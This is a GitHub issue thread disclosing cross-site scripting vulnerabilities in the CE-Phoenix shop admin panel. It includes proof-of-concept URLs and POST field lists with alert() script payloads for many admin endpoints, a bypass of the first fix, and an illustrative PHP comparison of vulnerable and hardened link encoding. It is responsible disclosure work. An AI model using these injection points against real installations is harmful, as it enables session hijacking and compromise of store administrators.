This repository has been archived by the owner on Jun 7, 2024. It is now read-only.

XSS vulnerabilities in the admin panel #1039

Closed
ovanr opened this issue Jan 27, 2021 · 2 comments
ovanr commented Jan 27, 2021

Issue description

An RXSS vulnerability was identified in the admin panel due to insufficient sanitization of the GET parameter 'module'.
As a result, JavaScript code can be executed using an exploit link.

Steps to reproduce the issue

  1. Log in to the admin panel to retrieve the session cookies
  2. Send the link: http://{HOSTNAME}/admin/action_recorder.php?module=';alert(0xdeadbeef);'&aID
  3. Click on a row in the HTML table, and the alert is shown

Additional details / screenshot

  • The XSS payload leaves the URL link

  • Proof

ecartz added a commit that referenced this issue Jan 27, 2021
This removes the module GET parameter if it doesn't match any of
the installed modules.

#1039
ovanr commented Jan 27, 2021

This commit still allows other parameters to enter the URL without being sanitized.
For instance this URL still triggers the bug:
http://{HOSTNAME}/admin/action_recorder.php?module=ar_admin_login&aID&myxss=';alert(0xdeadbeef);'

In Line 157 of admin/action_recorder.php:

  • tep_get_all_get_params outputs all GET parameters without any sanitization
  • tep_href_link only encodes the double quote character
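The encoding gap described in this comment, shown as an added illustration that is not PhoenixCart's own code: a hypothetical link builder that copies every GET parameter and escapes only the double quote, beside a hardened one that keeps only allow-listed parameter names, URL-encodes each name and value, and HTML-encodes the finished attribute with ENT_QUOTES. The row markup, the function names and the allow-list are assumptions.

```php
<?php
// Added illustration, not PhoenixCart's own code. The function names
// (build_query_unsafe, render_row_unsafe, build_query_safe, render_row_safe)
// are hypothetical stand-ins for tep_get_all_get_params / tep_href_link.

// Vulnerable pattern as the report describes it: every GET parameter is
// copied into the link, and only the double quote is encoded.
function build_query_unsafe(array $get): string {
    $parts = [];
    foreach ($get as $name => $value) {
        $parts[] = $name . '=' . $value;
    }
    return implode('&', $parts);
}

function render_row_unsafe(string $query): string {
    $href = '/admin/action_recorder.php?' . $query;
    return "<tr onclick=\"document.location.href='"
         . str_replace('"', '&quot;', $href) . "'\">...</tr>";
}

// Hardened pattern: keep only allow-listed parameter names, URL-encode
// each name and value, then HTML-encode the attribute with ENT_QUOTES so
// a single quote cannot end the JavaScript string literal in onclick.
function build_query_safe(array $get, array $allowed): string {
    $parts = [];
    foreach ($get as $name => $value) {
        if (!in_array((string)$name, $allowed, true)) {
            continue;
        }
        $parts[] = rawurlencode((string)$name) . '=' . rawurlencode((string)$value);
    }
    return implode('&', $parts);
}

function render_row_safe(string $query): string {
    $href = '/admin/action_recorder.php?' . $query;
    return "<tr onclick=\"document.location.href='"
         . htmlspecialchars($href, ENT_QUOTES, 'UTF-8') . "'\">...</tr>";
}

// Constructed request mirroring the second proof-of-concept URL above.
$request = [
    'module' => 'ar_admin_login',
    'aID'    => '',
    'myxss'  => "';alert(0xdeadbeef);'",
];
echo render_row_unsafe(build_query_unsafe($request)), PHP_EOL;
echo render_row_safe(build_query_safe($request, ['module', 'aID'])), PHP_EOL;
```

In the hardened output the unknown `myxss` parameter is dropped entirely, and any quote in a surviving value reaches the attribute as `%27` / `&#039;` rather than as a literal that closes the JavaScript string.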

ovanr commented Feb 6, 2021

Several more XSS bugs were found in the admin panel.

  • the $_POST['option_name[1]'] parameter in:
      URL

      /admin/products_attributes.php

      GET parameters
      
      action: add_product_options
      option_page: 1
      value_page: 1
      attribute_page: 1
      
      POST parameters
      
      products_options_id: 2
      option_name[1]: <script>alert(1);</script>
      sort_order[1]: 32

  • the POST fields in (payload can also be triggered in the user store):
      URL

      /admin/categories.php

      GET parameters
      
      action: insert_category
      cPath: ''

      POST parameters
      
      categories_name[1]: <script>alert(1);</script>
      categories_seo_title[1]: <script>alert(2);</script>
      categories_description[1]: <script>alert(3);</script>
      categories_seo_description[1]: <script>alert(4);</script>
      categories_image: any
      sort_order: 1

  • the $_POST['value_name[1]'] parameter in:
      URL

      /admin/products_attributes.php
      
      GET parameters

      action: add_product_option_values
      option_page: 1
      value_page: 1
      attribute_page: 1

      POST parameters
     
      option_id: 1
      value_id: 3
      value_name[1]: <script>alert(1)</script>
      sort_order[1]: 2

  • the $_POST['products_description[1]'] and $_POST['products_name[1]'] parameters in:
      URL

      /admin/categories.php

      GET parameters
      
      cPath: ''
      action: insert_product

      POST parameters
      
      products_status: 1
      products_quantity: 323
      products_date_available: ''
      manufacturers_id: ''
      products_model: Any
      products_tax_class_id: 0
      products_price: 3232
      products_price_gross: 3232
      products_weight: 3232
      products_gtin: ''
      products_name[1]: <script>alert(1);</script>
      products_description[1]: <script>alert(2);</script>
      products_url: ''
      products_seo_title[1]: ''
      products_seo_description[1]: ''
      products_seo_keywords[1]: ''
      products_image: Any
      products_date_added: 2021-02-06 16:44:43

Note: Other POST parameters may also be vulnerable


  • the $_GET['zID'] parameter in:
      URL

      /admin/geo_zones.php
      
      GET parameters
       
      zID: '-alert(1)-'
      action: list

  • the $_POST['title'] parameter in:
      URL
     
      admin/currencies.php
      
      POST parameters
      
      cs: GBP
      title: <a onclick=alert()>clickme # 19 chars limit
      code: GBP
      symbol_left: £
      symbol_right:
      decimal_point: .
      thousands_point: ,
      decimal_places: 2
      value: 1

  • the $_GET['zpage'] parameter in:
      URL
       
      /admin/geo_zones.php
      
      GET parameters
      
      zpage: '-alert(1)-'
      action: list

Note: there is a CVE record for this bug CVE


  • the $_GET['spage'] parameter in:
      URL
      
      /admin/geo_zones.php
      
      GET parameters
      
      spage: '-alert(1)-'
      action: list

Note: there is a CVE record for this bug CVE


  • the $_POST['title'] and $_POST['content'] parameters in:
      URL
     
      /admin/newsletters.php
      
      POST parameters
      
      module: newsletter
      title: <script>alert(1);</script>
      content: <script>alert(2);</script>

@ovanr ovanr changed the title RXSS vulnerability in action_recorder.php XSS vulnerabilities in the admin panel Feb 6, 2021
ecartz added a commit to CE-PhoenixCart/PhoenixCart that referenced this issue Jun 9, 2021
As a side effect, this should resolve the original report at
gburton/CE-Phoenix#1039

Obviously it won't resolve the other pages, which would be separate.
@ecartz ecartz closed this as completed Sep 10, 2021